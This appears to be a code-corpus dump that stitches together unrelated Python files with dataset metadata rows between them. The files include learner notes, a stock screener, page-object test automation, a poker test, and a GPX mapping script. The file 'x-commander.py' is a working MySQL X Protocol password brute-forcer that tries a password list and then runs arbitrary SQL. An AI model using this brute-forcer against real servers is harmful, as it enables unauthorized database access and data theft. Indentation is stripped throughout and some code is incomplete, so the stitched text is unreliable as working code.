# passing re.VERBOSE lets you add whitespace and comments to the regex string passed re.compile()
# if you want to pass multiple arguemtns (re.DOTALL, re.IGNORECASE etc) combine with the | bitwise operator
# the bitwise OR isn't really used any other place in python language
# scaping the PDF sample phone/email directory data
# not sure why he didn't make it a text file to start with but whatever i converted pdf to txt file
#
#
#
#! python3
# in windows paths have to be escaped
# like c:\\spam
# can always use the raw string like r'c:\spam\eggs.png
# for windows could use this to build up a path
#winPath ='\\'.join(['folder1', 'folder2', 'folder3', 'file.png']) # windows only
#print(winPath)
# output:
# folder1\folder2\folder3\file.png
# ideal would want this to work on more than just windows
from decimal import ROUND_DOWN
from math import floor
import os
from unicodedata import decimal
# this includes os.path.join
#os.path.join('folder1', 'folder2', 'folder3', 'file.png')
#print(os.sep)
#curpath = os.getcwd() # get current working directory
#print(curpath)
#changeToWindows =
#os.chdir(curpath + '..') # not sure how to use this function. doesn't seem to do anything
#changeToWindows
# there's also
#os.path.abspath() # returns abosluate path of what you pass in, like a file name
# and
#os.path.isabs() # I assume returns whether or not a path is an absolute (string)
# functions
#os.path.relpath('c:\\folder1\\folder2\\spam.png', 'c:\\folder1')
# returns folder2\\spam.png
# also
#os.path.dirname('c:\\folder1\\folder2\\spam.png') # just returns c:\\folder1\\folder2
# and
#os.path.basename('c:\\folder1\\folder2') # just 'folder2', thing after final slash
#os.path.exists('c:\\folder1\\folder2\\spam.png') # standard ifexist sort of text
# these two seems kind of self-explanatory
#os.path.isfile() # is file?
#os.path.isdir() # is directory?
#os.path.getsize() # pass in file and it returns int size in bytes
#getlist = os.listdir('.') # pass in folder and it will return list of strings that inculdes files/folders
#print(getlist)
# this did return list of files/folders inside current directory which was c:\Python310
#samplePath = 'C:\\Users\\Keith\\Documents\\repos\\ReallyHadtoPython\\automate boring stuff'
samplePath = 'c:\windows\system32'
totalSize = 0
for filename in os.listdir(samplePath):
if not os.path.isfile(os.path.join(samplePath, filename)):
continue
totalSize = totalSize + os.path.getsize(os.path.join(samplePath, filename))
calcSize = int(totalSize) / 1024
#round(calcSize)
#floor(int(calcSize))
#round(int(calcSize))
#print(calcSize) # has long decimal value, not sure how to cut that off yet. and haven't looked it up
os.makedirs() # used to create folders, relative or absolute | true |
879110f3e0fc99a0b3ed0f2c52621efe1bf0560f | Python | javenonly/stock | /src/old/GetTodayAll_N4.py | UTF-8 | 5,918 | 2.890625 | 3 | [] | no_license | #!/usr/bin/python
#coding:utf-8
import socket
import urllib
import tushare as ts
import pandas as pd
from time import sleep
import datetime
import tkinter
import tkinter.messagebox #这个是消息框,对话框的关键
#日期作为文件夹名字
var_date = '20180627'
#成交量的上涨比率
volume_up_rate = 1
#成交量的上涨比率开关
# volume_up_rate_lock = False
#最高价的比率
high_price_rate = 0.97
#涨幅最大比率
up_price_high = 1.07
#上影线比率
up_line_rate = 0.3
#读取所有股票代码
df_stock = pd.DataFrame(pd.read_csv('C:/stock_data/all_code.csv', index_col=None))
print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')) #日期格式化
for stockCode in df_stock.code:
# print('code-------------'+"%06d"%stockCode)
try:
df_today = ts.get_realtime_quotes("%06d"%stockCode) # 获取股票实时数据
# print(df_today)
# 实时成交量
volume_today = int(df_today.iloc[0].volume)/100
# print('volume_today-----------'+str(volume_today))
# 今日最高价
high_today = df_today.iloc[0].high
# 今日时价
price_today = df_today.iloc[0].price
# print('high_today-----------'+str(high_today))
#从csv文件中获取历史的股票数据
df_history = pd.DataFrame(pd.read_csv('C:/stock_data/' + var_date + '/' + "%06d" % stockCode + '.csv', index_col=None))
# 历史成交量
volume_yestoday_1 = df_history.iloc[0].volume
volume_yestoday_2 = df_history.iloc[1].volume
volume_yestoday_3 = df_history.iloc[2].volume
volume_yestoday_4 = df_history.iloc[3].volume
#历史最高价
high_yestoday_1 = df_history.iloc[0].high
high_yestoday_2 = df_history.iloc[1].high
high_yestoday_3 = df_history.iloc[2].high
high_yestoday_4 = df_history.iloc[3].high
high_yestoday_5 = df_history.iloc[4].high
high_yestoday_6 = df_history.iloc[5].high
high_yestoday_7 = df_history.iloc[6].high
high_yestoday_8 = df_history.iloc[7].high
high_yestoday_9 = df_history.iloc[8].high
high_yestoday_10 = df_history.iloc[9].high
if (
# 今日成交量放巨量 > 历史前1,2,3,4日成交量 * volume_up_rate
(volume_today > volume_yestoday_1 * volume_up_rate)
and (volume_today > volume_yestoday_2 * volume_up_rate)
and (volume_today > volume_yestoday_3 * volume_up_rate)
and (volume_today > volume_yestoday_4 * volume_up_rate)
#今日最高价 > 历史前1,2,3,4,5,6,7,8,9,10日最高价
and (float(high_today) > float(high_yestoday_1) * high_price_rate)
and (float(high_today) > float(high_yestoday_2) * high_price_rate)
and (float(high_today) > float(high_yestoday_3) * high_price_rate)
and (float(high_today) > float(high_yestoday_4) * high_price_rate)
and (float(high_today) > float(high_yestoday_5) * high_price_rate)
and (float(high_today) > float(high_yestoday_6) * high_price_rate)
and (float(high_today) > float(high_yestoday_7) * high_price_rate)
and (float(high_today) > float(high_yestoday_8) * high_price_rate)
and (float(high_today) > float(high_yestoday_9) * high_price_rate)
and (float(high_today) > float(high_yestoday_10) * high_price_rate)
and (float(high_today) < float(high_yestoday_1)
or float(high_today) < float(high_yestoday_2)
or float(high_today) < float(high_yestoday_3)
or float(high_today) < float(high_yestoday_4)
or float(high_today) < float(high_yestoday_5)
or float(high_today) < float(high_yestoday_6)
or float(high_today) < float(high_yestoday_7)
or float(high_today) < float(high_yestoday_8)
or float(high_today) < float(high_yestoday_9)
or float(high_today) < float(high_yestoday_10))
#今日现价 > 今日开盘价
and (df_today.iloc[0].price > df_today.iloc[0].open)
#up_price_low < 今日涨幅 < up_price_high
# and (float(df_today.iloc[0].price) / float(df_today.iloc[0].pre_close) > up_price_low)
and (float(df_today.iloc[0].price) / float(df_today.iloc[0].pre_close) < up_price_high)
# 历史前1日最高价 < 历史前2日最高价 or 历史前1日最高价 < 历史前3日最高价...
and (high_yestoday_1 < high_yestoday_2
or high_yestoday_1 < high_yestoday_3
or high_yestoday_1 < high_yestoday_4
or high_yestoday_1 < high_yestoday_5
or high_yestoday_1 < high_yestoday_6
or high_yestoday_1 < high_yestoday_7
or high_yestoday_1 < high_yestoday_8
or high_yestoday_1 < high_yestoday_9
or high_yestoday_1 < high_yestoday_10)
# 今日上影线 < up_line_rate
and ((float(df_today.iloc[0].high) - float(df_today.iloc[0].price)) / (float(df_today.iloc[0].high) - float(df_today.iloc[0].low)) < up_line_rate)):
print('code-------------' + "%06d" % stockCode)
# print('long')
# else:
# print('not')
except IndexError:
continue
except FileNotFoundError:
continue
except socket.timeout:
# print('timeout-------------' + "%06d" % stockCode)
continue
except urllib.error.URLError:
# print('URLError-------------' + "%06d" % stockCode)
continue
except ZeroDivisionError:
continue
print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')) #日期格式化 | true |
f782ba01781cd158c663990d7e2a70f4e57affa9 | Python | Aasthaengg/IBMdataset | /Python_codes/p02682/s024029716.py | UTF-8 | 188 | 2.984375 | 3 | [] | no_license | import sys
readline = sys.stdin.buffer.readline
a,b,c,k =list(map(int,readline().rstrip().split()))
if k <= a:
print(k)
elif k > a and k <= a + b:
print(a)
else:
print(a -(k-(a+b)))
| true |
47419c023908c84574eef3512fed0cead95ff0ac | Python | rvrsh3ll/X-Commander | /x-commander.py | UTF-8 | 3,146 | 2.71875 | 3 | [
"BSD-3-Clause"
] | permissive | import mysqlx
import argparse
def Brute(target,targetport,user,password,passwordfile,stop,verbose):
with open(passwordfile, "r") as f:
# Set passwords variable
passwords = f.readlines()
# For each password, try to connect with these settings
for pwd in passwords:
try:
session = mysqlx.get_session({
'host': target,
'port': targetport,
'user': user,
'password': pwd.rstrip()
})
# Cleanup session
session.close()
except Exception as e:
if verbose:
print("Connection failed with error: {}".format(e))
else:
continue
else:
print("Connection success with password: {}".format(pwd))
if stop:
break
def Query(target,targetport,user,password,database,query):
try:
session = mysqlx.get_session({
'host': target,
'port': targetport,
'user': user,
'password': password
})
if database:
# Switch to use our selected database
session.sql("USE {}".format(database)).execute()
# Execute the query
myResult = session.sql(query).execute()
# Fetch the results
results = myResult.fetch_all()
# Print the results
for row in results:
for col in myResult.columns:
print(row.get_string(col.get_column_name()))
else:
# If no database, just execute the query
myResult = session.sql(query).execute()
# Fetch results
results = myResult.fetch_all()
# Print results
for row in results:
for col in myResult.columns:
print(row.get_string(col.get_column_name()))
# Cleanup session
session.close()
except Exception as e:
# Print our error for troubleshooting
print("Connection failed with error: {}".format(e))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', type=str, required=True)
parser.add_argument('-p', '--port', type=int, default=33060, required=False)
parser.add_argument('-u', '--user', type=str, required=True)
parser.add_argument('-P', '--password', type=str, required=False)
parser.add_argument('-f', '--passwordfile', type=str, required=False)
parser.add_argument('-d', '--database', type=str, required=False)
parser.add_argument('-q', '--query', type=str, required=False)
parser.add_argument('-s', '--stoponsuccess', action='store_true', required=False)
parser.add_argument('-v', '--verbose', action='store_true', required=False)
args = parser.parse_args()
if args.query:
Query(args.target,args.port,args.user,args.password,args.database,args.query)
else:
Brute(args.target,args.port,args.user,args.password,args.passwordfile,args.stoponsuccess,args.verbose) | true |
5c64a4abfbd216eb89c925c392e4f7534b4487b3 | Python | 207772389/my_tp_shop | /page/page_add_pd.py | UTF-8 | 7,613 | 2.640625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
@Time : 2021/8/5 16:31
@Auth : cainiao
@File :page_add_pd.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)
"""
import page
from base.web_base import WebBase
from time import sleep
from tools.get_log import GetLog
log = GetLog.get_logger()
class PageAddPd(WebBase):
# 点击 新建
def addpd_click_add_btn(self):
self.base_click(page.pd_list_add_btn)
# 输入商品标题
def addpd_input_pd_title(self, pdtitle):
sleep(1)
self.base_input(page.pd_adding_pd_title, pdtitle, ele=2)
# 选择商品类型
def addpd_choose_pd_type(self):
# 先点击输入框
self.base_click(page.pd_adding_pd_type)
# 从下拉列表选择服务类
self.base_click(page.pd_adding_pd_typevalue)
# 选择预热时间
def addpd_choose_time(self):
# 先点击日期弹框
self.base_click(page.pd_adding_click_data)
# 从弹出的日期选择器里选择开始和结束时间 注意:这里的结束时间目前是固定选择最后一个日期的,还没有更好的方案
self.base_click(page.pd_adding_start_data)
self.base_click(page.pd_adding_end_data)
# 点击确定
self.base_click(page.pd_adding_date_ok)
# 选择用户评价
def addpd_choose_evaluation(self):
self.base_click(page.pd_adding_evluation)
# 输入商品名称
def addpd_input_pd_name(self, value):
self.base_input(page.pd_adding_pd_name, value, 3)
# 输入分享标题
def addpd_input_share_title(self, value):
self.base_input(page.pd_adding_share_title, value)
# 输入分享描述
def addpd_input_share_info(self, value):
self.base_input(page.pd_adding_share_info, value)
# 保存按钮
def addpd_click_save_btn(self):
self.base_click(page.pd_adding_save_btn)
# 确认弹框上的确认按钮
def addpd_click_makesure_ok(self):
self.base_click(page.pd_adding_makesure_ok)
# 业务组合方法
def addpd_test(self, pdtitle, pdname, sharetitle, shareinfo):
log.info("正在调用新增商品的业务组合方法")
self.base_click(page.pd_list_add_btn)
self.addpd_input_pd_title(pdtitle)
self.addpd_choose_pd_type()
self.addpd_choose_time()
self.addpd_choose_evaluation()
self.addpd_input_pd_name(pdname)
self.addpd_input_share_title(sharetitle)
self.addpd_input_share_info(shareinfo)
self.addpd_click_save_btn()
self.addpd_click_makesure_ok()
# 新增商品后回到商品列表,先点击状态,选择编辑中,获取第一个编辑的商品即为新增的商品
def addpd_click_status(self):
log.info("正在切换状态。。。")
# 先点击状态
self.base_click(page.pd_list_status)
# 下拉框中选择 编辑中
self.base_click(page.pd_list_choose_status, 1)
# 新增商品后 获取待编辑中的商品名称 给断言用
def addpd_get_pd_name(self):
log.info("正在获取商品列表的商品名称")
# 先调用上面的方法把状态切换为 编辑中
# self.addpd_click_status()
return self.base_get_text(page.pd_list_pd_name, 3)
"""至此,商品新建成功了,以下开始新建sku"""
# 新增商品后 开始新增sku,点击sku管理按钮
def addpd_click_addsku_manage(self):
log.info("开始新建新建sku了")
self.base_click(page.pd_list_sku_manage, 1)
# 进入新增sku界面,点击 新建sku
def addpd_click_addsku(self):
self.base_click(page.pd_list_add_sku)
# 进入新增sku
def addpd_click_addsku_btn(self):
self.base_click(page.pd_list_addsku_btn)
# 进入sku输入页面 开始编辑操作
def addpd_input_sku_period(self, period):
self.base_input(page.pd_list_addsku_period, period)
# 选择开营时间
def addpd_choose_sku_starttime(self):
# 先点击弹出选择器
self.base_click(page.pd_list_addsku_starttime_btn)
# 再点击选择日期
self.base_click(page.pd_list_addsk_choose_starttime)
# 再点击选择器上的确定按钮
self.base_click(page.pd_list_addsku_starttime_ok)
# 输入sku名称
def addpd_input_skuname(self, skuname):
self.base_input(page.pd_list_addsku_skuname, skuname)
# 输入原价
def addpd_input_origin_price(self, originprice):
self.base_input(page.pd_list_addsku_originprice, originprice)
# 输入特价
def addpd_input_especial_price(self, especialprice):
self.base_input(page.pd_list_addsku_especialprice, especialprice)
# 点击上面的保存按钮
def addpd_addsku_first_savebtn(self):
self.base_click(page.pd_list_addsku_first_savebtn)
# 点击下面的保存按钮
def addpd_addsku_second_savebtn(self):
log.info("sku新建成功了,sku is done!")
self.base_click(page.pd_list_addsku_second_savebtn)
"""至此,sku就新建完成了,返回到了sku列表页面,以下开始提交sku到上架状态"""
# 点击提交审批
def addpd_skulist_click_sp(self):
sleep(1)
self.base_click(page.pd_list_addsku_skulist_sp)
# 审批通过后 点击通过
def addpd_skulist_click_pass(self):
sleep(1)
self.base_click(page.pd_list_addsku_skulist_pass_sp)
# 通过后,就点击上架了
def addpd_skulist_click_sj(self):
log.info("恭喜,sku已经成功上架了!!!")
sleep(1)
self.base_click(page.pd_list_addsku_skulist_sj)
"""至此,sku状态变为上架了,点击 商品列表 回到商品列表页面,开始把商品状态变为上架"""
# 点击左边导航栏的 商品列表
def addpd_click_pdlist(self):
self.base_click(page.pd_list_click_pdlist)
# 点击商品后面的提交审批开始审批流程了 点击 提交审批
def addpd_pdlist_click_sp(self):
sleep(1)
self.base_click(page.pd_list_submit_sp, 2)
# 审批后,点击通过
def addpd_pdlist_click_pass(self):
sleep(1)
self.base_click(page.pd_list_click_pass, 2)
# 通过后,点击上架
def addpd_pdlist_click_sj(self):
sleep(1)
log.info("商品成功上架了")
self.base_click(page.pd_list_click_sj, 2)
# 添加sku业务方法+商品提交上架 组合
def addpd_add_sku(self, period, skuname, originprice, especialprice):
"""
:param period: sku的开营周期
:param skuname: sku的名称
:param originprice: sku的原价
:param especialprice: sku的特价
:return:
"""
self.addpd_click_addsku_manage()
self.addpd_click_addsku()
self.addpd_click_addsku_btn()
self.addpd_input_sku_period(period)
self.addpd_choose_sku_starttime()
self.addpd_input_skuname(skuname)
self.addpd_input_origin_price(originprice)
self.addpd_input_especial_price(especialprice)
self.addpd_addsku_first_savebtn()
self.addpd_addsku_second_savebtn()
self.addpd_skulist_click_sp()
self.addpd_skulist_click_pass()
self.addpd_skulist_click_sj()
self.addpd_click_pdlist()
self.addpd_pdlist_click_sp()
self.addpd_pdlist_click_pass()
self.addpd_pdlist_click_sj()
#商品上架后 获取商品的上架状态》断言时调用
def addpd_get_pd_status(self):
return self.base_get_text(page.pd_list_get_pd_status) | true |
8f1faad7bde758452ef4d2a9d41f7ca9f9c97b66 | Python | uzzal71/python-fundamentals | /HelloWorld3.py | UTF-8 | 79 | 2.65625 | 3 | [
"MIT"
] | permissive | print('Hello World!')
print('Hello Human, What is your name?')
name = input()
| true |
ba84820b6fff6ab739a4482f03f2f7168e5b2b43 | Python | tamasCsontos/poker-player-game-on | /tests/test_game.py | UTF-8 | 2,138 | 2.53125 | 3 | [
"MIT"
] | permissive | import game
GAME_STATE_JSON = {
'tournament_id':'550d1d68cd7bd10003000003',
'game_id':'550da1cb2d909006e90004b1',
'round': 0,
'bet_index': 0,
'small_blind': 10,
'current_buy_in': 320,
'pot': 400,
'minimum_raise': 240,
'dealer': 1,
'orbits': 7,
'in_action': 1,
'players': [
{
'id': 0,
'name': 'Albert',
'status': 'active',
'version': 'Default random player',
'stack': 1010,
'bet': 320
},
{
'id': 1,
'name': 'Game On',
'status': 'active',
'version': 'Default random player',
'stack': 1590,
'bet': 80,
'hole_cards': [
{
'rank': '6',
'suit': 'hearts'
},
{
'rank': 'K',
'suit': 'spades'
}
]
},
{
'id': 2,
'name': 'Chuck',
'status': 'out',
'version': 'Default random player',
'stack': 0,
'bet': 0
}
],
'community_cards': [
{
'rank': '4',
'suit': 'spades'
},
{
'rank': 'A',
'suit': 'hearts'
},
{
'rank': '6',
'suit': 'clubs'
}
]
}
def test_game_state_details():
game_state = game.GameState(GAME_STATE_JSON)
assert game_state.tournament_id == GAME_STATE_JSON['tournament_id']
assert game_state.game_id == GAME_STATE_JSON['game_id']
assert game_state.round == GAME_STATE_JSON['round']
assert game_state.pot == GAME_STATE_JSON['pot']
assert game_state.orbits == GAME_STATE_JSON['orbits']
assert game_state.dealer == GAME_STATE_JSON['dealer']
assert game_state.small_blind == GAME_STATE_JSON['small_blind']
assert game_state.big_blind == GAME_STATE_JSON['small_blind'] * 2
assert game_state.minimum_raise == GAME_STATE_JSON['minimum_raise']
assert game_state.in_action == GAME_STATE_JSON['in_action']
assert game_state.own_player.id == 1
assert game_state.own_player.name == "Game On"
| true |
fb9d9e291dafd71cf2d08844016ed6956e9d36f1 | Python | ofekashery/Ovl-Python | /ovl/helpers/get_defined_functions.py | UTF-8 | 739 | 3.09375 | 3 | [
"Apache-2.0"
] | permissive | from inspect import getmembers, isfunction
def get_defined_methods():
"""
Returns a list of all available functions within the current_vision scope
:return: list of function object that are callable
"""
function_list = []
for module, module_object in globals().items():
for sub_object_name, sub_object in getmembers(module_object):
if isfunction(sub_object):
function_list.append((sub_object_name, sub_object))
continue
for sub_members_name, sub_members_objects in getmembers(sub_object):
if isfunction(sub_members_objects):
function_list.append((sub_members_name, sub_members_objects))
return function_list
| true |
bffcd38ecdb78f19f9bce41c68f514358a200e5d | Python | jclarke100/PythonMapping | /ImportGPX.py | UTF-8 | 1,925 | 2.984375 | 3 | [] | no_license | """
Script to import all GPX tracks from a folder into a line feature class
in a file geodatabase. New line feature for each GPX file.
Generate linear density map of those lines to show where most tracks go.
Parameters:
1 - Path to source folder of GPX files
2 - Target feature class to which data is appended
3 - Option to truncate target feature class before data load
TODO:
Could do with some error handling, create FGDB if it doesn't exist etc
Also doesn't carry any attributes through from GPX, date/time would be good
"""
import sys, arcpy, os
def main():
print "Script started"
gpxFolder = sys.argv[1]
target = sys.argv[2]
doTruncate = sys.argv[3]
##gpxFolder = r"c:\stuff\python\gpx"
##target = r"c:\stuff\python\GPS.gdb\Tracks_1"
##doTruncate = False
if not os.path.isdir(gpxFolder):
print "No source folder found: " + gpxFolder
sys.exit(1)
if not arcpy.Exists(target):
print "No target found: " + target
sys.exit(1)
if doTruncate:
try:
print "Truncating %s..." % target
arcpy.TruncateTable_management(target)
except:
print "Target not found or can't truncate"
sys.exit()
for f in os.listdir(gpxFolder):
print "Processing file %s" % f
print "\tconvert to points in_mem"
arcpy.GPXtoFeatures_conversion(gpxFolder + "\\" + f, "in_memory\\track")
print "\tconvert in_memory points to lines"
arcpy.PointsToLine_management("in_memory\\track", "in_memory\\track_line")
print "\tadd the new in_mem line to target feature class"
arcpy.AddMessage(f)
print("\t" + f)
arcpy.Append_management("in_memory\\track_line", target, "NO_TEST")
# Line density stuff todo - needs Spatial Analyst
# lineDensity = LineDensity(target, "", 10, 20)
if __name__ == '__main__':
main()
| true |